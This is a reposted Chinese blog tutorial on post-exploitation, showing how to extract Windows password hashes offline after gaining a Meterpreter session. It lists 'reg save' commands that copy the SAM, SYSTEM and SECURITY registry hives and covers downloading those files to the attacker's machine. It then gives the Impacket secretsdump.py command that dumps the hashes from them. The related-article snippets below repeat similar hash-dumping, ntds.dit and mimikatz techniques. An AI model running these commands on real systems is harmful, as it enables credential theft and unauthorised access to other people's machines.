离线提取目标机hash

最新推荐文章于 2022-08-06 08:30:50 发布
最新推荐文章于 2022-08-06 08:30:50 发布
阅读量168 收藏
点赞数
文章标签: python shell ldap
原文链接:http://www.cnblogs.com/-qing-/p/10742450.html
版权

0x01 前言

很多环境下,不允许上传或者使用mimikatz。而针对非域控的单机离线提取hash显得尤为重要。

meterpreter shell命令切到交互式cmd命令。

 

0x02 过程

 

 

reg save 方式使得需要下载的目标机

Ps:reg save将指定子项、项的注册表值的副本保存到指定文件中

我们需要导出的hash文件

 

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv

meterpreter中使用shell命令来到交互式cmd

 

这样在c盘下就导出了三个注册表文件

 

返回meterpreter,使用meterpreter下自带download功能来将目标机的三个注册表文件下载到攻击机

 

 

 

下载好了后我们需要读取目标的hash

用到的工具是impacketsecretsdump.pyKali默认路径:

 

/root/impacket/examples/secretsdump.py

 

 

Ps:Impacket是一个Python类库,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。 

 

 

命令如下:

python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL

 

转载于:https://www.cnblogs.com/-qing-/p/10742450.html

weixin_30950887
关注
CentOS7.8离线安装Docker24.0.2,离线安装gcc与g++环境
Heartsuit的博客
07-16 1821
有时候运维时要求在内网环境下操作,即服务器无法连接互联网,那么就无法通过 yum 源在线安装。。这时,一般通过以下3种方式来安装需要的软件: 下载源码包编译安装; 下载对应平台编译好的安装包,解压即可; 下载rpm包,本地安装。 在离线环境下,如果需要进行源码编译安装,比如 Nginx 、 Redis 等,则要求具备 gcc 与 g++ 这些基础环境。以下通过 rpm 包进行 gcc 与 g++ 的离线安装。
获取目标HASH值的方法总结
gugonggugong的博客
03-18 739
PassingTheHash hash基础知识 hash获取 a. 获取system权限下直接用hashdump命令: b. 利用后渗透模块的脚本: c. 利用smart_hashdump模块获取hash: 绕过UAC提权 直接获取hash值 运行hash_dump模块获取hash: Hash破解和传递 破解 弱口令破解模块 传递 ...
离线取域控制器HASH的工具NTDSDUMP
03-11
离线取域控制器HASH神器,必须同时有域控制器上取的ntds.dit文件以及SYSTEM文件,SYSTEM文件可通过“reg save hklm\system system.hive”
离线提取域控HASH的方法
weixin_30385925的博客
02-28 741
1、注册表提取 提取文件,Windows Server 2003或者Win XP 及以前需要提升到system权限,以后只要Administrator权限即可。 reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security secruity.hive 本地获取 #如果要提取明文,请修改注册表 ...
内网安全:05.dump内网DC的ntds.dit,获取hash
qq_38473097的博客
06-21 654
叙述:有时候我们碰到一个内网环境,有DC的密码,于是使用这个方法,出DC中所有内网主的密码并破解 0x0 环境 DC:172.31.20.30  domain用户:pentest\administrator 密码:UFhae&pwL%F 内网主A(win 2012):172.31.21.166 psexec:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec secretsdump:https://github.co.
内网渗透总结二:第二步管理员密码的明文和hash获取
yggcwhat
05-06 4060
内网渗透总结二:第二步管理员密码的明文和hash获取
第六十五课:离线提取目标hash补充.docx
09-15
离线提取目标Hash补充 在 APT 攻击和防御中,离线提取目标 Hash 是一项关键步骤。在之前的课程中,我们已经学习了如何使用 Linux 作为背景来离线提取 Hash。今天,我们将学习如何使用 Windows 作为背景来离线...
离线提取目标hash(第五十六课).docx
09-15
### 离线提取目标Hash技术解析 #### 一、引言 随着网络安全环境的日益复杂,针对特定目标的高级持续性威胁(Advanced Persistent Threats, APT)攻击手段不断翻新。其中,离线提取目标哈希值(hash)是一种重要...
离线密码破解之John the Ripper
马赛克的博客
04-04 3666
前言: 密码破解技术总体上有两大类 1.在线密码破解,通过发送正确的账户和密码进行破解,常用的工具有Hydra和Medusa 2.离线密码破解,独立攻击密码散列(hash) 关于在线密码破解,可以参考:https://blog.csdn.net/qq_39112646/article/details/88664630 步骤: 定位并下载目标系统的密码散列文件...
离线数仓总结
wywwyx090104的博客
08-17 3809
离线数仓总结 一、1、背景介绍(某APP上线后,由于业务模式新颖,市场需求量大,经过一段时间的精心运营后,逐渐积累起了上千万会员,以及三四百万的日活量, app的业务功能和产品种类、数量也急速膨胀;主要问题有:营销分析断层;产品迭代无法量化;用户运营不精准;全局运营指标监控不实时) 2、需求总览:流量域分析 2.1、基础数据分析(整体概况、用户获取、活跃与留存、事件转化、用户特征) 2.2、基础数据分析指标概览 整体概况:产品整体的使用情况,包括用户量、访问情况、留存等帮助对产品整体指标有一个大致的了解(累
hashcat项目office加密特征提取工具
08-27
hashcat项目office加密特征提取工具。 可以提取office类的加密特征,用于破解。
离线抓取域登录缓存hash(mscash)
weixin_33759269的博客
07-13 750
注意:这次抓取的是域成员的hash 并不是域控的hash注册表出:reg save hklm\sam c:\sam.hive & reg save hklm\system c:\system.hive & reg save hklm\security c:\security.hivemscash(域缓存hash)提取cain能从hive文件中提取m...
【kali-漏洞利用】(3.3)后渗透之Meterpreter(上):命令大全
08-06 4006
【kali-漏洞利用】Meterpreter后渗透
出系统注册表抓Hash的思路整理
weixin_34289744的博客
04-28 664
先看看“出系统注册表抓Hash” 的原文,挺不错的思路。 ==============原文============== 出处 : http://pentest.cc/?p=133 现在登录目标 3389后,我看好多人都已经习惯抓密码 HASH然后回来彩虹表破解出明文了,或者传个winloginhack来记录 3389的登录密码。在我最近的...
windows hash 抓取(dump)工具 - quarkspwdump
海阔天空
03-18 6776
测试:Windows7 64位     Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。
利用mimikatz抓取密码及散列值
Zlirving_的博客
01-15 2110
目录windows系统散列值获取前提介绍在线读取散列值及明文密码离线读取lsass.dmp文件防范 windows系统散列值获取 域环境中,用户信息存储在ntds.dit,加密成散列值(都为散列加密算法) LM HASH:DES加密。明文密码限定在14为以内。不够字节用0补齐 NTLM HASH:MD4加密。 前提介绍 抓取密码之前,必须为最高权限。windows下用户名、散列值及其他安全信息都保存在SAM文件中。lsass.exe进程用于实现windows安全策略. 工具: Mimikatz Procd
获取windows hash的几种方式
lansefly1990的专栏
02-26 6784
一、windows hash介绍 NTML hash是指在windows系统下的Security Account Manager中保存的用户密码hashhash的生成方法: 将明文口令转换成十六进制的格式; 转换成Unicode格式,即在每个字节之后添加0x00; 对Unicode字符串作MD4加密,生成32位的十六进制数字串; 如测试测试密码为haha123 转成十六进制为:...
【Kali渗透全方位实战】通过获取到的hash进行密码破解!(Hashcat)
李响
03-20 6697
文章目录1 Hashcat简介2 扫描模式3 常用参数4 实例演示4.1 掩码破解4.2 字典破解4.3 zip 1 Hashcat简介 哈希密码(Password Hash) 对口令进行一次性的加密处理而形成的杂乱字符串。这个加密的过程被认为是不可逆的,也就是说,人们认为从哈希串中是不可能还原出原口令的。 HashCat系列软件在硬件上支持使用CPU、NVIDIA GPU、ATI GPU来进行...
基于hash的特征提取算法
最新发布
06-08
基于哈希的特征提取算法通常指的是局部敏感哈希(Locality Sensitive Hashing,LSH)算法。该算法可以用于高维空间中的数据点的相似性搜索和聚类。 LSH算法的基本思想是将高维数据点通过哈希函数映射到低维空间中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值